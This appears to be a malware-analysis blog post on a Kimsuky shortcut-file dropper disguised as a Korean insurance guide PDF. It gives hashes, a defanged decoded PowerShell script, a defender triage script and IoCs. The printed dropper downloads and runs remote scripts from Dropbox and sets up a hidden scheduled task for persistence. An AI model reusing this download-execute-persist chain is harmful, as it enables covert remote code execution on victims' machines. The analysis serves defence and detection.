Malware made by Kimsuky disguised as a whole-life insurance guide (종신안내장): 종신안내장v02_곽X환d.zip (2025.2.5)
Today I will write about a piece of malware made by the North Korean hacking group Kimsuky that is disguised as a whole-life insurance guide (종신안내장): 종신안내장v02_곽X환d.zip (2025.2.5). It is made to look like a PDF file, but it is actually not a PDF file; it is just a link (shortcut) file. The hash values of the malware are as follows.
File name: 종신안내장v02_곽X환d.zip
Size: 6,427 Bytes
MD5: 40837012253331958723dda63fdfabff
SHA-256: 079907b7feab3673a1767dbfbc0626e656f5d3b03b6cff471cc7cf8a1973ab34
Base64 encoded
Base64 decoded
# Decoded dropper script. The defanging used in the original post (hxxps, (.)) is kept, so this text cannot be run as-is.
# Stage 1: save the decoy document under %TEMP%, download it from Dropbox and open it
$hhh = Join-Path ([System(.)IO(.)Path]::GetTempPath()) "종신안내장V02_곽x환D(.)pdf(.)pdf";
wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/lc7j7be3vtd2f3hadv0bz/V02_-D(.)pdf.pdf?rlkey=wnah9edf39vv8va7gvmo9d)ymch&st=64lizr6k&dl=0" -OutFile $hhh;
& $hhh;
# Stage 2: write chrome.ps1 into %APPDATA%; each time it runs it downloads temp.ps1, executes it and deletes it
$ppp = Join-Path ($env:AppData) "chrome(.)ps1";
$str = '$aaa = Join-Path ($env:AppData) "temp(.)ps1"; wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/gs58u6qvvxorzttv09yvt/kxsxhx-x(.)txt?rlkey=v86pd7i2njm70pfutl0knu68&st=gjvdcw8r&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;';
$str | Out-File -FilePath $ppp -Encoding UTF8;
# Stage 3: persistence. A hidden scheduled task named ChromeUpdateTaskMachine starts 5 minutes later and re-runs chrome.ps1 every 30 minutes
$action = New-ScheduledTaskAction -Execute 'PowerShell(.)exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome(.)ps1\"; & $abc;}"';
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30);
$settings = New-ScheduledTaskSettingsSet -Hidden;
Register-ScheduledTask -TaskName "ChromeUpdateTaskMachine" -Action $action -Trigger $trigger -Settings $settings;
# Stage 4: download system_first.ps1 into %APPDATA%, run it once immediately, then delete it
$aaa = Join-Path ($env:AppData) "system_first(.)ps1";
wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/sumch8o12a4ko7wqqtrgo/kxsxhx-f(.)txt?rlkey=i8yto5xg3unffs9wawhytu1v4&st=rek9dgcl&dl=0" -OutFile $aaa;
& $aaa;
Remove-Item -Path $aaa -Force;
Code analysis
1. Join-Path ([System(.)IO(.)Path]::GetTempPath()) 종신안내장V02_곽x환D(.)pdf(.)pdf
Sets the path under the temporary folder (Temp) where the file 종신안내장V02_곽X환D(.)pdf(.)pdf will be saved.
Downloads the file named V02_-D.pdf.pdf from Dropbox and saves it in Temp …
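As an added defender-side triage example (not code from the original post), the following PowerShell script hunts a host for the artefacts the decoded script leaves behind: the hidden ChromeUpdateTaskMachine task (or any task whose action runs chrome.ps1 from AppData), the staging scripts chrome.ps1, temp.ps1 and system_first.ps1 in %APPDATA%, and a double-extension .pdf.pdf decoy in %TEMP%. It assumes it is run with administrator rights; the -Remediate switch and the variable names are my own.

```powershell
# Host triage for the Kimsuky PowerShell dropper described above (added example, not from the post).
# Reports only by default; -Remediate deletes the task and files. Assumes an elevated PowerShell session.
param([switch]$Remediate)

$taskName   = 'ChromeUpdateTaskMachine'                          # name registered by the dropper
$stageFiles = 'chrome.ps1', 'temp.ps1', 'system_first.ps1' |
              ForEach-Object { Join-Path $env:APPDATA $_ }      # staging scripts written to %APPDATA%
$tempDir    = [System.IO.Path]::GetTempPath()                    # decoy is dropped here as *.pdf.pdf

# 1) Scheduled tasks: exact name match, or any task whose action runs chrome.ps1 out of AppData
$suspectTasks = Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object {
    $t = $_
    ($t.TaskName -eq $taskName) -or
    ($t.Actions | Where-Object { $_.Arguments -match 'chrome\.ps1' -and $_.Arguments -match 'AppData' })
}
foreach ($t in $suspectTasks) {
    Write-Output "[TASK] $($t.TaskPath)$($t.TaskName)  state=$($t.State)"
    foreach ($a in $t.Actions) { Write-Output "       action: $($a.Execute) $($a.Arguments)" }
    if ($Remediate) {
        Unregister-ScheduledTask -TaskName $t.TaskName -TaskPath $t.TaskPath -Confirm:$false
        Write-Output "       removed"
    }
}
if (-not $suspectTasks) { Write-Output "[TASK] no matching scheduled task" }

# 2) Staging scripts. temp.ps1 and system_first.ps1 are deleted right after use, so a hit on those
#    means the loader is mid-run or its cleanup failed; chrome.ps1 is meant to persist.
foreach ($f in $stageFiles) {
    if (Test-Path -LiteralPath $f) {
        $hash = (Get-FileHash -LiteralPath $f -Algorithm SHA256).Hash
        Write-Output "[FILE] $f  sha256=$hash"
        if ($Remediate) { Remove-Item -LiteralPath $f -Force; Write-Output "       removed" }
    }
}

# 3) Decoy: the downloaded document keeps a double extension (.pdf.pdf), which is rare for legitimate files
Get-ChildItem -Path $tempDir -Filter '*.pdf.pdf' -File -ErrorAction SilentlyContinue | ForEach-Object {
    Write-Output "[DECOY] $($_.FullName)  written=$($_.LastWriteTime)"
}
```

The scheduled-task match on the action arguments, rather than only on the task name, also catches re-named variants of the same persistence mechanism.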
IoC
40837012253331958723dda63fdfabff
079907b7feab3673a1767dbfbc0626e656f5d3b03b6cff471cc7cf8a1973ab34